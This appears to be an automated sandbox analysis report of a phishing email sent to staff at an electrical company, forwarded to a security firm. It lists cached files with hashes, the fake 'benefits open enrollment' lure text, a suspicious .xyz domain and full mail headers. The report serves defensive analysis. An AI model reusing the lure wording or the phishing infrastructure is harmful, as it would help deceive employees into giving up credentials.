                                          URL:https://288682c1-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/images/hip_text.gif
                                          Preview:GIF89a.....;....333..........ZZY.........fff.........ssr...........................................................................................MML.........@@@....................................!.....;.,.............p.+.....9.P'..D.`..........t..pB\C.k..n...[..x7hRt..x7-}.92....}%p5.+..8..9552...n2...#.3//...3../33..."*..3+.../9..22....3....+./.9.2......9.........3.....}(.).....5..........7......`...........,"J....D>Dlh...F4D(..I..I..@...!..0]B..d%..*w...;

                                          Chrome Cache Entry: 157

                                          Download File
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                          Category:downloaded
                                          Size (bytes):12980
                                          Entropy (8bit):4.656952280411437
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:8EDFCD3F7A179CFF6B123DFF50F29770
                                          SHA1:7A2D9BB4B9F6072AB3049E6421021A5BA0A3DADF
                                          SHA-256:D0B747C7F7414A08B0D5107832B2F4BB44A9BB4A3AAD28390F58EDE8BBEA6AE1
                                          SHA-512:169D1C71078DCB1C65B3CBAFBA3379B94718D6C1E472990666430A6B2C0483CC9B27E13820A29D2DCA2364D3CD3F7D2ECDED48B9ACF406BF74CB505489FB9503
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://288682c1-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/js/Button.js?v=1342177280
                                          Preview:.//------------------------------------------------------------..// Copyright (c) Microsoft Corporation. All rights reserved...//------------------------------------------------------------....var Button = new Object();....Button.ActiveButton = null;..Button.FocusButton = null;..Button.DefaultButton = null;..Button.CancelButton = null;..Button.ActivatedButtonID = null;..Button.Groups = {};....Button.SetText = function(id, text) {.. var button = document.getElementById(id);.. if (button != null) {.. for (var i = 0; i < button.children.length; i++) {.. var ch = button.children[i];.. if (ch.tagName.toLowerCase() == 'span') {.. ch.innerHTML = text; //// TODO: this causes the text wrapped with an <a> tag to get inserted in Firefox, which needs to get fixed... break;.. }.. }.. }.. var span = document.getElementById(id + '_disabled');.. if (span != null) {.. for (var i = 0; i < span.childr

                                          Chrome Cache Entry: 158

                                          Download File
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PNG image data, 17 x 25, 8-bit/color RGBA, non-interlaced
                                          Category:dropped
                                          Size (bytes):471
                                          Entropy (8bit):7.197252382638843
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:C651D60A08FF0F579E2EB9BE6043A3C6
                                          SHA1:E7BCBB896EEA20A4DC68EDD2EF5B336E92690A55
                                          SHA-256:7B4B6ADAA1DDA648143A18A52B51DFAAB54775BDB6284DFF5C869235CD385230
                                          SHA-512:017C29423F096A45AD5D1002B2F14E27A8298F144A962B78F46A96626A1027D5E4EC57468CD8F8C5B9E97461FA651452A1786CD9F5F76264652D03F55D516138
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:.PNG........IHDR..............>.....sRGB.........gAMA......a.....pHYs..........+......tEXtSoftware.Adobe ImageReadyq.e<...GIDAT8O...@...;Wa.`.X....b....... A.F....K...a..t*{3.e...K.....C..0.....)~;.eYvP....L}.KAEQP.4..WYd....mV]..m....$M...`...C.$R.......`..dM.T....,RU..TU..`.'0.!...D[`p..W)D8,dv]Wt....\^v.$.s..`.i...!...D..e$......$.8../..8....;..\6,...f|....n.....e..M...g.O.9....q..&........0.w...k...z....\.iZ..c.;.F...Uq7.'Y....X ....IEND.B`.

                                          Chrome Cache Entry: 159

                                          Download File
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 89501
                                          Category:downloaded
                                          Size (bytes):30947
                                          Entropy (8bit):7.991365257160597
                                          Encrypted:true
                                          SSDEEP:
                                          MD5:08DF9F54C9E2E91DB3AADC1BAFF368A5
                                          SHA1:A8E6C9343489D3C36CF262A10F59D22540248C49
                                          SHA-256:417453D1FCABA01D9543B7649FC12EE865E118714D5F86A8316216E9BB4FDD20
                                          SHA-512:1328AB52B081560038BE0F34219B8C877CB35A7C0DFBA869373985753CF827478F6B41D0846CA3FC877C275E7C89FDA0598F822D4CC0D7F4EAE6BB8B72483B24
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://2ac4b5bb-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/ajax/jQuery/jquery-3.6.0.min.js
                                          Preview:............y{.F./...)DL..0...Lr.B.8..x&..lC1y`.)!.....D.|.[......3...3..4z....N..~.n+........GG.#...}...?.>..2..,=...QV^..h..e...Y^P..~...,.<Y'.........[m..>..(..oK...lQz./{..(*.72[.]g..Z...x1.w.,/.i.6..e..^....Lo..U..C..{U.....T.....,.==.\..MrY..G.I..2.IyEw.K/.........C..{43r..r..Lw..S...WI!l..lL.M....l.......R...Y...oV...a.9..t.Z...............Y..lA...f}.S.TPl......]P.....F.{.E...........6..md^.8....X5....{Tq....G..c......W.(.i....^.O..I).....t.^.".PF...Z..x..Y@....U...(..~R.....b.....T...0,...+.....O.t.{.....K.b-Q....<..b...a)...."x...h..4.|...r?+.V.....<....aQ{&.`B.!.%.R...d...`..s...4q.\^g7...a.6.&h*.........j..2.g4..Yh..1?..cD...L.....@.)..3...Qm.^...ey...aQ......wM...;..8..{.6VhD?%uU..Ky|<:.?.`.e...E.....Bl.J..=.].....B8.e..-U....P...@....kS.%p...t4..L...;...^`....m.J5c..k._J.j.t....p..Q...1.*.B...>...+d.q.o.bi._..O..7~... @..m*.4.z..uLd..B#0.:./y?..`..Ey....?.2...".1..72}w?...|d.~........-.....J]...c..H...}..(.U.^ont...

                                          Static File Info

                                          General

                                          File type:CDFV2 Microsoft Outlook Message
                                          Entropy (8bit):5.359111436112627
                                          TrID:
                                          • Outlook Message (71009/1) 58.92%
                                          • Outlook Form Template (41509/1) 34.44%
                                          • Generic OLE2 / Multistream Compound File (8008/1) 6.64%
                                          File name:44zg1cvu.msg
                                          File size:211'968 bytes
                                          MD5:42b3b3e14a1c514a7647e2916c6f4cb5
                                          SHA1:b4db942f9d4ab74ee0c488433f083d273fad0c86
                                          SHA256:e66b870ef3fa0efb51d0912366587a5c2033a7b582088bac6e899c2cf366e897
                                          SHA512:4dbc8bd1ee635673b0bcde134a6c740e673f4f60fd2e25af10f473f2df3763b94eba65176153a62cfb76b70dd357b527293eae8ad8c30a6cd48ff71ee42a80f5
                                          SSDEEP:3072:3T21CMrS62CVP1fC6xyYpGi7cGU2EiaZHy7N21:j21/x2Cd1fhqS8ZZSp
                                          TLSH:3424C8143EE66125F2B3AE3506EB9097D53BFC926D28C54EA142774D0A71A01EC72F3B
                                          File Content Preview:........................>...................................%..................................................................................................................................................................................................

                                          Static Mail

                                          General

                                          Subject:FW: BENEFITS OPEN ENROLLMENT 2024-2025 - PLEASE READ for Scott-electric | Friday, 28th of June 2024 | m144zg1cvu
                                          From:Sarah Moore <sarah@scott-electric.com>
                                          To:CoreRecon Support <support@corerecon.com>
                                          Cc:
                                          BCC:
                                          Date:Fri, 28 Jun 2024 18:26:55 +0200
                                          Communications:
                                          • This is not an email that we generated, however, we use employee navigator. Im afraid someone has hacked into our benefits portal or something. Please look into this asap.
                                          • From: Melodi Bunn <melodi@scott-electric.com> Sent: Friday, June 28, 2024 11:25 AM To: Sarah Moore <sarah@scott-electric.com> Subject: FW: BENEFITS OPEN ENROLLMENT 2024-2025 - PLEASE READ for Scott-electric | Friday, 28th of June 2024 | m144zg1cvu Importance: High
                                          • From: HR Management Scott-electric <noreply@netchexonline.com <mailto:noreply@netchexonline.com> > Sent: Friday, June 28, 2024 11:20 AM To: Melodi Bunn <melodi@scott-electric.com <mailto:melodi@scott-electric.com> > Subject: BENEFITS OPEN ENROLLMENT 2024-2025 - PLEASE READ for Scott-electric | Friday, 28th of June 2024 | m144zg1cvu Importance: High This email was sent from outside your organisation, yet is displaying the name of someone from your organisation. This often happens in phishing attempts. Please only interact with this email if you know its source and that the content is safe. We are excited to announce that Open Enrollment for your 2024 benefits is now open! This is your opportunity to make choices that will ensure you have the coverage you need for the upcoming year. Key Details: * Open Enrollment Period: June 27, 2024, through July 2, 2024. * Access Employee Navigator: Attached is the form to access and review your options. * All employees must Elect or Decline benefits by July 2, 2024. What You Need to Do: 1. Select and review the New Benefit Coverage: Take the time to understand your current health, dental, vision, and supplemental insurance plans. Ensure they still align with your needs. 2. Assess Your Needs: Consider any changes in your life or healthcare requirements that may necessitate adjustments to your coverage. 3. Select Your Plans: Choose the insurance plans that best fit your circumstances for the coming year. You will need to select the benefit plan you want, as your old plan will not roll over. 4. Waiving Coverage: If you decide to decline the benefits offered, you are required to acknowledge your decision during the enrollment process. 5. Enrollment Deadline: Be aware of the enrollment deadline of July 2, 2024, as late submissions may result in losing coverage. Get Help: If you have questions or need assistance during the enrollment process, don't hesitate to reach out to our HR department. We encourage every employee to participate actively in Open Enrollment to ensure your benefits meet your needs in the coming year. Thank you for being a valued member of the Scott-electric team, and we look forward to helping you make informed choices regarding your benefits. Warm regards, Human Resources Manager Scott-electric <https://u14584191.ct.sendgrid.net/wf/open?upn=u001.rMjSeMFaqWw9i-2F-2B5yeCMi5l9r5xkM-2Bl6Fzf9atq9mDHemw-2F5xPBBVpbqcQVStsUqu2-2BzOtxIdSFJcypWVNF4O0BmTV0HebiNy6JxZbdA8OWhyg-2Ft2X6jUF7nGiXzHvUTn71XzEsacjInn-2FTVMdpG9yMwXsbiSByeVJmDsHiqSSrVAykirxcjYZ1Q5OeIyra7ahEfY-2Bc10N8Me7BhVEgAXHeXJdgZWmcGd8AH-2BZQ-2B6cU-3D>
                                          Attachments:
                                          • LLZ-950309.htm

                                          Headers

                                          Key Value
                                          Receivedfrom PH7PR16MB5878.namprd16.prod.outlook.com
                                          1626:55 +0000
                                          ARC-Seali=1; a=rsa-sha256; s=arcselector9901; d=microsoft.com; cv=none;
                                          ARC-Message-Signaturei=1; a=rsa-sha256; c=relaxed/relaxed; d=microsoft.com;
                                          h=FromDate:Subject:Message-ID:Content-Type:MIME-Version:X-MS-Exchange-AntiSpam-MessageData-ChunkCount:X-MS-Exchange-AntiSpam-MessageData-0:X-MS-Exchange-AntiSpam-MessageData-1;
                                          ARC-Authentication-Resultsi=1; mx.microsoft.com 1; spf=pass
                                          by SJ1PR11MB6130.namprd11.prod.outlook.com (260310b6:a03:45f::9) with
                                          2024 1626:55 +0000
                                          (260310b6:303:b7::30) with Microsoft SMTP Server (version=TLS1_2,
                                          Transport; Fri, 28 Jun 2024 1626:58 +0000
                                          Authentication-Resultsspf=pass (sender IP is 40.107.94.97)
                                          Received-SPFPass (protection.outlook.com: domain of scott-electric.com
                                          15.20.7677.15 via Frontend Transport; Fri, 28 Jun 2024 1626:57 +0000
                                          by SA6PR16MB6731.namprd16.prod.outlook.com (260310b6:806:419::11) with
                                          ([fe80:94c2:ebd:646d:d09e%4]) with mapi id 15.20.7698.025; Fri, 28 Jun 2024
                                          FromSarah Moore <sarah@scott-electric.com>
                                          ToCoreRecon Support <support@corerecon.com>
                                          SubjectFW: BENEFITS OPEN ENROLLMENT 2024-2025 - PLEASE READ for
                                          Thread-TopicBENEFITS OPEN ENROLLMENT 2024-2025 - PLEASE READ for
                                          Thread-IndexAQHayXcG2Xl8FQckwkiVpv//5JPcMrHdXG9QgAAAcuA=
                                          Importancehigh
                                          X-Priority1
                                          DateFri, 28 Jun 2024 16:26:55 +0000
                                          Message-ID<PH7PR16MB58788A60AE1BC85B6F6C23BF8DD02@PH7PR16MB5878.namprd16.prod.outlook.com>
                                          References<GNx05bbCfB3WC9FcNqD2papEiBcPnv9zHh07ajxnmY@0459e2201581797e163cfe396ba83a0e>
                                          In-Reply-To<IA1PR16MB52622F6D56EEA940E3E425A1E2D02@IA1PR16MB5262.namprd16.prod.outlook.com>
                                          Accept-Languageen-US
                                          Content-Languageen-US
                                          X-MS-Has-Attachyes
                                          X-MS-TNEF-CorrelatorAuthentication-Results-Original: dkim=none (message not signed)
                                          x-ms-traffictypediagnosticPH7PR16MB5878:EE_|SA6PR16MB6731:EE_|SJ5PEPF000001F2:EE_|SJ1PR11MB6130:EE_|IA1PR11MB6291:EE_
                                          X-MS-Office365-Filtering-Correlation-Id9b44da7a-01a7-4f0c-3c89-08dc978f2180
                                          x-ms-exchange-senderadcheck1
                                          x-ms-exchange-antispam-relay0
                                          X-Microsoft-Antispam-UntrustedBCL:0;ARA:13230040|69100299015|366016|376014|1800799024|38070700018;
                                          X-Microsoft-Antispam-Message-Info-Original=?us-ascii?Q?1KJHhDZGMQgT+h1N0QbqTOtmR9X/FKqoaj2O5EcmVIWcHzJsxLkAY4RLF6zg?=
                                          X-Forefront-Antispam-Report-UntrustedCIP:255.255.255.255;CTRY:;LANG:en;SCL:1;SRV:;IPV:NLI;SFV:NSPM;H:PH7PR16MB5878.namprd16.prod.outlook.com;PTR:;CAT:NONE;SFS:(13230040)(69100299015)(366016)(376014)(1800799024)(38070700018);DIR:OUT;SFP:1102;
                                          X-MS-Exchange-AntiSpam-MessageData-Original-ChunkCount1
                                          X-MS-Exchange-AntiSpam-MessageData-Original-0=?us-ascii?Q?l4hr7tFXJ21/6NcIMQEhZDaqAIaxHoG4q9fRptWNeRAQiZEWPpVQMLIbD7Mz?=
                                          Content-Typemultipart/mixed;
                                          MIME-Version1.0
                                          X-MS-Exchange-Transport-CrossTenantHeadersStampedSJ1PR11MB6130
                                          Return-Pathsarah@scott-electric.com
                                          X-MS-Exchange-Organization-ExpirationStartTime28 Jun 2024 16:26:57.7937
                                          X-MS-Exchange-Organization-ExpirationStartTimeReasonOriginalSubmit
                                          X-MS-Exchange-Organization-ExpirationInterval1:00:00:00.0000000
                                          X-MS-Exchange-Organization-ExpirationIntervalReasonOriginalSubmit
                                          X-MS-Exchange-Organization-Network-Message-Id9b44da7a-01a7-4f0c-3c89-08dc978f2180
                                          X-EOPAttributedMessage0
                                          X-EOPTenantAttributedMessagefd95b4e8-ccc7-4e27-b8dc-ec4c54e4a14d:0
                                          X-MS-Exchange-Organization-MessageDirectionalityIncoming
                                          X-MS-Exchange-Transport-CrossTenantHeadersStrippedSJ5PEPF000001F2.namprd05.prod.outlook.com
                                          X-MS-Exchange-Transport-CrossTenantHeadersPromotedSJ5PEPF000001F2.namprd05.prod.outlook.com
                                          X-MS-PublicTrafficTypeEmail
                                          X-MS-Exchange-Organization-AuthSourceSJ5PEPF000001F2.namprd05.prod.outlook.com
                                          X-MS-Exchange-Organization-AuthAsAnonymous
                                          X-MS-Office365-Filtering-Correlation-Id-Prvsdacbd541-1fca-4073-e8ac-08dc978f1ff5
                                          X-MS-Exchange-Organization-SCL1
                                          X-Microsoft-AntispamBCL:0;ARA:13230040|35042699022|12012899012|69100299015;
                                          X-Forefront-Antispam-ReportCIP:40.107.94.97;CTRY:US;LANG:en;SCL:1;SRV:;IPV:NLI;SFV:NSPM;H:NAM10-MW2-obe.outbound.protection.outlook.com;PTR:mail-mw2nam10on2097.outbound.protection.outlook.com;CAT:NONE;SFS:(13230040)(35042699022)(12012899012)(69100299015);DIR:INB;
                                          X-MS-Exchange-CrossTenant-OriginalArrivalTime28 Jun 2024 16:26:57.5906
                                          X-MS-Exchange-CrossTenant-Network-Message-Id9b44da7a-01a7-4f0c-3c89-08dc978f2180
                                          X-MS-Exchange-CrossTenant-Idfd95b4e8-ccc7-4e27-b8dc-ec4c54e4a14d
                                          X-MS-Exchange-CrossTenant-AuthSourceSJ5PEPF000001F2.namprd05.prod.outlook.com
                                          X-MS-Exchange-CrossTenant-AuthAsAnonymous
                                          X-MS-Exchange-CrossTenant-FromEntityHeaderInternet
                                          X-MS-Exchange-Transport-EndToEndLatency00:00:05.9753408
                                          X-MS-Exchange-Processed-By-BccFoldering15.20.7698.013
                                          X-Microsoft-Antispam-Mailbox-Deliveryucf:0;jmr:0;auth:0;dest:I;ENG:(910001)(944506478)(944626604)(920097)(930097)(140003);
                                          X-Microsoft-Antispam-Message-Info=?us-ascii?Q?31Mofrx2/PtftmgGi8mP7+/k+Jl/9i6rQ31JGkUksC8meJcczR+JXvyqUl/U?=
                                          dateFri, 28 Jun 2024 18:26:55 +0200

                                          File Icon

                                          Icon Hash:c4e1928eacb280a2